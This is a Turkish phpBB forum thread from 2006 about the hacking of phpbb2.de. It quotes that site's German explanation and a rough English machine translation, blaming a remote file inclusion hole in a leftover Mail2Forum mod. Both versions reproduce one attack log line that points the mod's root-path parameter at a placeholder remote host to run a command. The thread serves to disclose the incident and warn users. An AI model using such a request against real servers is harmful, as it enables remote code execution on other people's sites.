phpbb2.de hacklendi
Forum kuralları
- Yeni bir başlık açarken lütfen konu başlığına "Acil yardım", "Acele yardım" tarzlarında içerisinde "yardım" kelimesi geçen cümleler yazmayınız. Bu tip başlıklara kesinlikle cevap verilmeyecektir. Lütfen konu başlığına içeriği en iyi özetleyen anlaşılabilir bir cümle yazınız.
- Ayrıca yeni başlıklarınızı kesinlikle ilgili forumlara açınız. Örneğin, phpBB3 kurulum ve çalıştırması hakkında bir sorununuz varsa "3.0.x Destek Forumu" forumuna başlık açınız; phpBB3 temasından kaynaklı bir sorunuz varsa "3.0.x Stil/Tema Geliştirme & Tartışma & Yardım" forumuna başlık açınız; phpBB3 mod/eklentileriyle ilgili sorununuz varsa "3.0.x MOD Destek" forumuna başlık açınız. Bu kurala uymayan kullanıcıların başlıkları silinebilir ve kullanıcı uyarı alabilir ya da süresiz uzaklaştırılabilir.
- Site kurallarımızı okumadan kesinlikle forumlarımıza herhangi bir katılım yapmayınız.
- Yeni bir başlık açarken lütfen konu başlığına "Acil yardım", "Acele yardım" tarzlarında içerisinde "yardım" kelimesi geçen cümleler yazmayınız. Bu tip başlıklara kesinlikle cevap verilmeyecektir. Lütfen konu başlığına içeriği en iyi özetleyen anlaşılabilir bir cümle yazınız.
- Ayrıca yeni başlıklarınızı kesinlikle ilgili forumlara açınız. Örneğin, phpBB3 kurulum ve çalıştırması hakkında bir sorununuz varsa "3.0.x Destek Forumu" forumuna başlık açınız; phpBB3 temasından kaynaklı bir sorunuz varsa "3.0.x Stil/Tema Geliştirme & Tartışma & Yardım" forumuna başlık açınız; phpBB3 mod/eklentileriyle ilgili sorununuz varsa "3.0.x MOD Destek" forumuna başlık açınız. Bu kurala uymayan kullanıcıların başlıkları silinebilir ve kullanıcı uyarı alabilir ya da süresiz uzaklaştırılabilir.
- Site kurallarımızı okumadan kesinlikle forumlarımıza herhangi bir katılım yapmayınız.
phpbb2.de hacklendi
| Site Kuralları| [ resmi görüntülemek için tıklayın ]
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
kesin olayı çözecekler, inceleme yapıyorlar uzun sürdü.
phpbb hack sanırım hataya baksanıza.
phpbb hack sanırım hataya baksanıza.
| Site Kuralları| [ resmi görüntülemek için tıklayın ]
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
siteyi çalıştırdılar.
almancası olan varsa açıklayabilir detayları
almancası olan varsa açıklayabilir detayları
Hier schonmal eine kurze Erklärung was passiert ist, wieso phpBB2.de gehackt wurde.
Wir hatten vor Jahren mal das Modul M2F getestet (Mail2Forum) welches seinerzeit von Netclectic programmiert wurde, haben es aber nie aktiv eingesetzt, dummerweise existierte der Ordner noch auf dem Webspace. Eine nun neu aufgetauchtes Sicherheitsleck in diesem Mod führte nun dazu, das phpBB2.de über diese Lücke gehackt wurde. Im Log-File sieht das beispielsweise so aus:Kod: Tümünü seç
196.xxx.xx.x - - [18/Jul/2006:05:52:35 +0200] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://www.bad_url_here.com/badfile.txt?/cmd.txt?&cmd=ls HTTP/1.1" 200 4431 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Diese Lücke ist nicht im Standard phpBB2 oder phpBB2 Plus enthalten, da in diesen Version kein M2F Mod verwendet wird.
Wir werden nun die Logfiles genau auswerten, jedoch ist sicher, das genau diese Sicherheitslücke ausgenutzt wurde, und dies kein generelles Sicherheitsleck in phpBB2 darstellt ! Daher empfehlen wir allen Usern von M2F, zumindest temporär dieses Modul komplett zu deinstallieren bis die Lücke in einer neuen Version geschlossen wurde !
| Site Kuralları| [ resmi görüntülemek için tıklayın ]
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
-
- Kayıtlı Kullanıcı
- Mesajlar: 137
- Kayıt: 09.05.2006, 12:22
- İletişim:
Here already times a short explanation which passed, why phpBB2.de was chopped.
We years ago times the module M2F had tested (Mail2Forum) which by Netclectic were at that time programmed, to have it stupid-proved however never actively assigned, existed the file still on the Web space. Now safety leakage in this Mod, emerged again, led now to it, the phpBB2.de across this gap was chopped. In the log file looks for example in such a way:
This gap is not contained in the standard phpBB2 or phpBB2 plus, since into this version no M2F Mod is used.
We will exactly evaluate now the log files, however is safe, which were used exactly this safety gap, and this no general safety leakage in phpBB2 represents! Therefore we recommend all Usern of M2F, at least temporarly this module completely to deinstallieren to the gap in a new version were closed!
We years ago times the module M2F had tested (Mail2Forum) which by Netclectic were at that time programmed, to have it stupid-proved however never actively assigned, existed the file still on the Web space. Now safety leakage in this Mod, emerged again, led now to it, the phpBB2.de across this gap was chopped. In the log file looks for example in such a way:
Kod: Tümünü seç
196.xxx.xx.x -- [18/Jul/2006: 05: 52: 35 +0200] “GET /m2f/m2f_phpbb204.php? m2f_root_path= http://www.bad_url_here.com/badfile.txt?/cmd.txt?&cmd=ls HTTP/1.1” 200 4431” - ““Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5,1)”
This gap is not contained in the standard phpBB2 or phpBB2 plus, since into this version no M2F Mod is used.
We will exactly evaluate now the log files, however is safe, which were used exactly this safety gap, and this no general safety leakage in phpBB2 represents! Therefore we recommend all Usern of M2F, at least temporarly this module completely to deinstallieren to the gap in a new version were closed!
söylediklerine göre phpbb plus ile birlikte kullandıkları bir sayfadaki script yüzünden bir açık oluşmuş ve bu açık yüzünden hacklenmiş, plus direkt olarak hacklenmemiş demeye getirmiş..
| Site Kuralları| [ resmi görüntülemek için tıklayın ]
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
[ resmi görüntülemek için tıklayın ]
Türkiyenin #1 phpBB kaynağı phpbbturkey.com
-
- Kayıtlı Kullanıcı
- Mesajlar: 137
- Kayıt: 09.05.2006, 12:22
- İletişim:
Kimler çevrimiçi
Bu forumu görüntüleyen kullanıcılar: Hiç bir kayıtlı kullanıcı yok ve 11 misafir